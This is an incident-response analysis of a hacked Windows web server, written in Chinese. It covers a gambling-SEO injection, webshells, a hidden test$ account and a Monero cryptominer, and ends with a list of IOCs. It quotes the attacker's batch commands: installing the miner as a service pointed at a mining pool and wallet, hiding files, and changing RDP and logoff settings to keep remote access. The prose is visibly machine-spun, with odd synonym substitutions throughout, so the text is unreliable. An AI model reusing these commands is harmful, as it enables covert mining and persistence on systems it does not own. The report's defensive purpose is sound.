一次入侵应急响应分析

本文是前段光阴处置惩罚某用户被黑的阐发总结,用户被黑的体现是应用爬虫造访用户网站的首页时会呈现博彩关键字,而应用正常浏览器造访时无相关的博彩关键词。这是范例的黑帽SEO的体现,针对这种技巧,前期文章已有相关阐发,感兴趣的同砚可以看一看。

这次阐发,发明用户的办事器被多波不合利益的黑客入侵,里面有一些对照故意思的内容,以是特意阐发总结了一下。

一、概述

1、阐发结果

颠末阐发,今朝获得以下结论:

1)办事器上存在博彩信息与挖矿法度榜样,阐明被多波不合利益团队的黑客入侵;

2)此办事器于2018年9月21日被黑客入侵后加上响应的博彩内容,响应的IP为175.41.27.93;

3)此办事器在2016年2月份以致更早就已经被黑客植入网马了;

4)办事器在2017年12月19日被植入挖矿法度榜样;

5)系统被增添了暗藏账号test$,并且在2018年9月21日14:38发明账号guest有IP为212.66.52.88,地舆位置为乌克兰登录的环境。

二、阐发历程

2.1 入侵征象

2018年9月份,经由过程我司监测平台监测到某网站被植入博彩内容,详细如下:

网站被植入博彩信息

网站被植入博彩基础上阐明网站被黑客入侵,我司“捕影”应急相应小组急速帮忙用户进行入侵阐发。

2.2 系统阐发

系统阐发主要用于阐发其系统账号、进程、开放端口、连接、启动项、文件完备性、关键设置设置设备摆设摆设文件等,经由过程系统相关项的阐发判断其系统层面是否正常。对其系统层面阐发,发明以下层面存在问题:

系统账号

对系统账号的阐发,今朝发明系统存在以下账号:

Administraotr、MYSQL_ZKEYS、test$ 、zhimei、renjian、APP_IWAM_61264026、APP_IWAM_6127201、guest

此中test$显着为暗藏账号,一样平常环境下系统治理员不会增添暗藏账号,该账号肯定为黑客增添。别的几个账号,如zhimei、renjian等为可疑账号,必要治理职员进行确认。

系统账号环境

治理员信息

治理员组中存在administrator和guest,一样平常环境下guest为宾客账号,不会增添到治理员组中,狐疑该账号为黑客增添到治理员组中。

系统账号存在两个问题:

1)办事器被增添test$暗藏账号

2)Guest账号被加入到治理员组中

日志阐发

经由过程相关平安产品的日志,可以看到guest账号于2018年9月21日14:38被IP为212.66.52.88的乌克兰IP登录,该账号密码肯定已泄露,建议禁用该账号。

进程与办事阐发

对其办事器阐发,发明其办事器的CPU使用率异常高,使用率为100%。发明主要被SQLServer.exe占用。

CPU使用率为100%

SQLServer.exe占用CPU最高

找到该法度榜样所在的目录,发明该法度榜样放在C:\ProgramData\MySQL目录下,并且被目录被暗藏。里面有四个文件,两个bat文件,两个exe文件。

【Startservice.bat功能阐发】

对startservice.bat进行阐发,其内容如下:

其功能如下:

1)set SERVICE_NAME=SystemHost,指定其办事名为SystemHost:

2)Tomcat9 install”%SERVICE_NAME%” SQLServer.exe -o stratum+tcp://pool.minexmr.com:7777–u 49ZRiTZK93yBqAJWBTh2zTAjvq8z9oTn38Rc2ScqSF7E8oRizddzy2iTh6kyyRibt

7Ai1w8RWhTAPPPti4ZABeMpHhCJa1F -p x -dbg -1-t 0

应用Tomcat9 安装响应的挖矿法度榜样,挖矿参数阐发:

矿池地址

pool.minexmr.com

矿池端口

7777

矿工账号

49ZRiTZK93yBqAJWBTh2zTAjvq8z9oTn38Rc2ScqSF7E8oRizddzy2iTh6kyyRibt7Ai1w8RWhTAPPPti4ZABeMpHhCJa1F

挖矿法度榜样被植入光阴

[1] [2] [3]下一页

2017年12月19 日16:29

挖数字泉币类型

XMR 门罗币,一种全匿名的数字泉币。其特征在于买卖营业历程全匿名,无法追踪。

挖XMR数量与代价

7.6XMR 人夷易近币约6000元

矿池网站

黑客挖XMR数量

挖矿法度榜样被植入光阴

3)Set ProcessName=SQLServer.exe指定进程名为SQLServer.exe:

4)attrib +h +r %cd%\*.*

感化:将该目录下的所有文件暗藏

5) reg add “HKLM\system\CurrentControlSet\Control\Terminal Server

\WinStations\RDP-Tcp” /v “MaxConnectionTime”/t REG_DWORD /d 0x1 /f

reg add”HKLM\system\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp” /v “MaxDisconnectionTime” /tREG_DWORD /d 0x0 /f

reg add”HKLM\system\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp” /v “MaxIdleTime” /t REG_DWORD /d 0x0/f

功能:设置设置设备摆设摆设注册表,感化为使远程连接永不超时。

6) net accounts /forcelogoff:no

功能: 防止强制注销用户

【mHi.bat功能阐发】

mHi.bat的功能如下:

1)将c:\ProgramData及C:\ProgramData\MySQL暗藏,防止安然职员发明;

2)指定C:\ProgramData\MySQL、C:\WINDOWS\Tasks\AdobeFlash Player Updater.job、C:\WINDOWS\Tasks\GoogleUpdateTaskMashine.job相关文件的造访节制权限,仅容许SYSTEM组用户完全节制:

mHi.bat功能

calcls功能

【SQLServer.exe功能阐发】

子进程,主要功能用来挖矿

【Tomcat9.exe功能阐发】

1)SQLServer.exe的父进程,用来守护SQLServer.exe,

2)SQLServer.exe一旦被关闭,会急速启动SQLServer.exe

【功能总结】

经由过程以上阐发,可以看出,黑客增添的四个文件的主要感化如下:

【应急处置】

直接关闭SQLServer.exe,该法度榜样立马启动。因为其存在父进程,直接查找父进程,敕令如下:wmic process whereName=”SQLServer.exe” get ParentProcessID:

首先关闭父进程Tomcat9.exe,然后再关闭子进程SQLServer.exe,挖矿法度榜样被清除,CPU应用正常。

开放端口

对其该办事器进行阐发,发明该办事器开放以下端口:

端口开放环境

端口开放环境

建议关闭 21 、 135 、 445 、 8080 等端口,其他端口必要根据营业需求来抉择是否关闭。

其他阐发

对该办事器的连接、安装软件、关键设置设置设备摆设摆设文件、启动项阐发,今朝未发明非常。

阐发结论

经由过程对系统层面阐发,其办事器系统层面主要存在以下问题:

1)办事器被增添test$暗藏账号

2)Guest账号被加入到治理员组中

3)guest账号于2018年9月21日14:38被IP为212.66.52.88的乌克兰IP登录,该账号密码已泄露,今朝已禁用该账号

4)端口开放过多,此中21、135、445、8080等端口建议关闭

5)2017年12月19日已被植入挖矿法度榜样

2.3 利用阐发

博彩页面阐发

【技巧道理】

经由过程内容阐发,发明这次黑客为SEO性子的。其主要目的在于经由过程黑帽SEO获取经济利益,一样平常环境下,黑客植入博彩内容有以下道路:

前端挟制

前端挟制一样平常都是在网站的响应页面中插入JS脚本,经由过程JS来进行跳转挟制。也有发明黑客直接改动响应的页面内容的。

上一页[1] [2] [3]下一页

办事器端挟制

办事器端挟制也称为后端挟制,其是经由过程改动网站动态说话文件,如global.asax、global.asa、conn.asp、conn.php这种文件。这些文件是动态脚本每次加载时都邑加载的设置设置设备摆设摆设文件,如造访x.php时会加载conn.php。这样的话,只必要改动这些全局的动态脚本文件(如global.asax),造访所有的aspx文件时都邑加载这个global.asax文件,可以达到全局挟制的效果。

针对以上两种挟制技巧,可以直接查看我前期的技巧阐发:http://www.freebuf.com/articles/web/153788.html

【博彩阐发】

经由过程页面阐发判断为在办事器端挟制,办事器端挟制一样平常是改动全局设置设置设备摆设摆设文件,如global.asax、global.asa、conn.asp、conn.php。

经由过程对该办事器阐发,发明其改动config_global.php该文件。植入如下内容:

这里面黑客将响应的挟制内容进行base64加密了,将此中base64加密的内容进行base64解密,获得以下内容:

此中 function isSpider()函数主要用来判断是否为爬虫造访,爬虫的浏览器特性如下:

$bots= array(‘baidu’=> ‘baiduspider’,’sogou’=> ‘sogou’,’360spider’=> ‘haosouspider’,’360spider’=> ‘360spider’,’bingbot’=> ‘bingbot’,’Yisou’=> ‘Yisouspider’,

假如是爬虫则返回http://l5.wang2017.com/相关的内容。

【应急处置】

处置的话对照简单,直接将黑客增添的base64加密的内容删除即可,删除相关内容今后,造访正常。

Webshell阐发

Webshell主如果网马,其感化为经由过程webshell可以节制全部办事器,并进行系统级其余操作,应用D盾对办事器查杀,发明存在23个webshell。

webshell

选择部分其代码如下:

201806r4kfjtv4zexnvfbf.jpg图片马

针对网站发明的23个webshell,今朝相关webshell均已删除。

2.4 日志阐发

未找到有效日志,无法阐发入侵缘故原由及道路。

三、IOC

3.1 IP

212.66.52.88

175.41.27.93

3.2 URL

http://l5.wang2017.com

3.3 样本MD5

70D9E2761B18CB0E4C4051E905F9E7A5

EA9F0B1E88B5E21B9A9D31D5C46E81D7

A3CD992FDDC2300AD8A23AD16FE3725C

A8ADE1F8D0D87E4D7A75919EE6B3740F

58A9B144762916FE227AF329F5D384F1

DBBB0ACE277D955833696F06C610DE2E

7F7D78755E070860EFFFD1272F14C7A7

9A5772ED22973DA02A45872BBC3735F2

E276D34B3AE124E8218CBC32B4D341B2

B663F32281526B17A540655EC05EC9EC

0D66C67B8BEC9627B696DEB275862E72

634630797CACCC334EFF054FE6279E91

AB908A995367FF0055DFF903F515B061

5D52847EC2CCC750951EF0765AEEC17B

249D7774648FB1CD309AA23B3F96430B

C13D2297D244D398B6A311DDA87DBDC7

C23206B81B06D64933C5FBC24AF69CF6

E14E6B1629ED5079F55B69DF66EDAFD7

8D01D604794D3494CBB31570B1E54182

2A235990DD38A0BCBAF2C4835EB8C0A3

5D568BC15EE4D861583E68B63762C2B1

0D66C67B8BEC9627B696DEB275862E72

3.4 矿池地址

stratum+tcp://pool.minexmr.com:7777

3.5 钱包地址

49ZRiTZK93yBqAJWBTh2zTAjvq8z9oTn38Rc2ScqSF7E8oRizddzy2iTh6kyyRibt7Ai1w8RWhTAPPPti4ZABeMpHhCJa1F

上一页[1] [2] [3]

赞(0) 打赏
分享到: 更多 (0)
免责申明:本站所有资料均来自于网络,版权归原创者所有!本站不提供任何保证,不保证真实性,并不承担任何法律责任

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

阿里云优惠网 更专业 更优惠

阿里云优惠券阿里云大礼包